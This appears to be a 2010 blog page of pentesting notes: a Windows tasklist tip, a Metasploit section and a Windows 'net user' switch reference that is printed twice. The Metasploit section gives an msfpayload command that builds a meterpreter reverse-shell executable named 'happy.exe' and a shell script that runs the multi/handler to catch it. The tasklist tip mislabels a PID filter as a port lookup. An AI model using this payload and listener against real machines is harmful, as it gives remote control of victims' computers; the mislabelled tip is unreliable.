Thursday, August 19, 2010
Tuesday, August 17, 2010
Sunday, August 15, 2010
Windows Associated PID with Port
Unlike linux's nice netstat -anp, windows yet again tries to make life difficult to accomplish the same task:
tasklist /svc /FI "PID eq [port]" //displays service associated with open port.
Monday, August 9, 2010
Automating Metasploit with Shell Scripting
Created a small shell script to automate the multi/handler in Metasploit. This script works with msfpayload executable (ex: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8080 X > happy.exe) .
MSF_PATH="/pentest/exploits/framework3/"
MSFCLI=$MSF_PATH"msfcli";
INTERFACE="eth0";
LPORT="8080";
PAYLOAD="windows/meterpreter/reverse_tcp";
echo "Metasploit multi/handler";
LHOST=`ifconfig $INTERFACE | grep "inet addr" | cut -d":" -f2 | cut -d" " -f1`;
echo "LHOST=$LHOST";
echo "LPORT=$LPORT";
$MSFCLI multi/handler PAYLOAD=$PAYLOAD LHOST=$LHOST LPORT=$LPORT E
Thursday, August 5, 2010
Windows net user commands reference
Reference: http://articles.techrepublic.com.com/5100-10878_11-5031577.html
ex: net user [account] /delete
/DOMAIN—Performs the operation on a domain controller of the current domain.
/ADD—Adds a user account to the user accounts database.
/DELETE—Removes a user account from the user accounts database.
/ACTIVE:—Type /ACTIVE:YES to activate the account. /ACTIVE:NO deactivates the account.
/COMMENT:”text”—You can use this command to provide a comment about the user. You can enter up to 48 characters as a description. Make sure you enclose the comment in quotation marks.
/COUNTRYCODE:—This switch allows you to change the operating system country code for the user. This will cause Windows to implement a language file for a user's help and error messages. A value of 0 signifies the default country code.
/EXPIRES:—This switch allows you to set an expiration date for the user. You can either enter a date in mm/dd/yyyy format or enter a value of NEVER. NEVER sets no expiration for the account.
/FULLNAME:"name"—This switch changes the user's full name, not the username. Replace name with the user’s name enclosed in quotation marks.
/HOMEDIR:pathname—This switch sets the path (pathname) for the user's home directory. The path must already exist for the switch to work properly.
/PASSWORDCHG:—If you type /PASSWORDCHG:YES, users can change their own passwords. Conversely, setting it to NO disables password changing. The default is YES.
/PASSWORDREQ:—This switch specifies whether a user account must have a password. The default is YES, but you can type /PASSWORDREQ:NO to disable passwords for the account.
/PROFILEPATH:pathname—This switch sets a path for the user's logon profile.
/SCRIPTPATH:pathname—This switch sets the location of the user's logon script.
/TIMES:—This switch allows you to set the user’s logon hours. If you set the value to ALL, the user can always log on. The syntax is reasonably complicated if you want to set available logon times. Times can only be expressed in one-hour increments. Starting times/days and ending times/days are separated by a dash (-). Days, and times in the same day, are separated by a comma (,). Multiple day/time combinations are separated by a semicolon (;). This might be a setting that would be more efficient using a GUI.
/USERCOMMENT:"text"—This switch sets the User Comment field shown above. Don’t confuse it with the Comment switch just mentioned.
/WORKSTATIONS:—This switch allows you to specify workstation names the user can log in from. By default, a user can use any workstation. You can specify this explicitly by following this switch with an asterisk (*). To limit a user, type in individual workstation names. You can enter as many as eight workstation names, separating each one with a comma.
ex: net user [account] /delete
/DOMAIN—Performs the operation on a domain controller of the current domain.
/ADD—Adds a user account to the user accounts database.
/DELETE—Removes a user account from the user accounts database.
/ACTIVE:—Type /ACTIVE:YES to activate the account. /ACTIVE:NO deactivates the account.
/COMMENT:”text”—You can use this command to provide a comment about the user. You can enter up to 48 characters as a description. Make sure you enclose the comment in quotation marks.
/COUNTRYCODE:—This switch allows you to change the operating system country code for the user. This will cause Windows to implement a language file for a user's help and error messages. A value of 0 signifies the default country code.
/EXPIRES:—This switch allows you to set an expiration date for the user. You can either enter a date in mm/dd/yyyy format or enter a value of NEVER. NEVER sets no expiration for the account.
/FULLNAME:"name"—This switch changes the user's full name, not the username. Replace name with the user’s name enclosed in quotation marks.
/HOMEDIR:pathname—This switch sets the path (pathname) for the user's home directory. The path must already exist for the switch to work properly.
/PASSWORDCHG:—If you type /PASSWORDCHG:YES, users can change their own passwords. Conversely, setting it to NO disables password changing. The default is YES.
/PASSWORDREQ:—This switch specifies whether a user account must have a password. The default is YES, but you can type /PASSWORDREQ:NO to disable passwords for the account.
/PROFILEPATH:pathname—This switch sets a path for the user's logon profile.
/SCRIPTPATH:pathname—This switch sets the location of the user's logon script.
/TIMES:—This switch allows you to set the user’s logon hours. If you set the value to ALL, the user can always log on. The syntax is reasonably complicated if you want to set available logon times. Times can only be expressed in one-hour increments. Starting times/days and ending times/days are separated by a dash (-). Days, and times in the same day, are separated by a comma (,). Multiple day/time combinations are separated by a semicolon (;). This might be a setting that would be more efficient using a GUI.
/USERCOMMENT:"text"—This switch sets the User Comment field shown above. Don’t confuse it with the Comment switch just mentioned.
/WORKSTATIONS:—This switch allows you to specify workstation names the user can log in from. By default, a user can use any workstation. You can specify this explicitly by following this switch with an asterisk (*). To limit a user, type in individual workstation names. You can enter as many as eight workstation names, separating each one with a comma.
Subscribe to:
Posts (Atom)